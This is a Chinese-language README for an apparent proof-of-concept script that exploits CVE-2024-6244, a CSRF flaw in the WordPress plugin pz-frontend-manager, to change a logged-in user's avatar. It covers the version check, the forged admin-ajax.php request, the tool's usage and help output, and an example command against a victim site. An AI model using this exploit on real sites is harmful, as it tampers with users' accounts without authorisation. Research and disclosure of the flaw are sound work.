此脚本利用 WordPress 插件 pz-frontend-manager(版本 <= 1.0.5)中的 CSRF 漏洞,在已登录用户不知情的情况下更改其个人资料头像。
🔴 CVE-2024-6244
该插件缺乏适当的 CSRF 保护,允许攻击者通过精心构造的请求强制已认证用户执行非预期的操作。
readme.txt 以判断目标站点是否运行存在漏洞的版本(< 1.0.6)。admin-ajax.php 发送伪造请求来上传头像。/wp-content/uploads/2025/02/
python3 CVE-2024-6244.py -u <TARGET_URL> -U <USERNAME> -p <PASSWORD> -i <IMAGE_FILE>
usage: p.py [-h] --url URL --username USERNAME --password PASSWORD [--image IMAGE]
pz-frontend-manager <= 1.0.5 - CSRF change user profile picture
options:
-h, --help show this help message and exit
--url URL, -u URL Base URL of the WordPress site
--username USERNAME, -U USERNAME
Username for login
--password PASSWORD, -p PASSWORD
Password for login
--image IMAGE, -i IMAGE
Image file name (default: Nxploit.jpg)
python3 CVE-2024-6244.py -u "https://victim-site.com" -U "admin" -p "password123" -i "new_avatar.png"
requests 模块(pip install requests)此脚本仅供 教育和安全研究 使用。未经许可以任何方式利用网站是 违法的,并可能导致严重后果。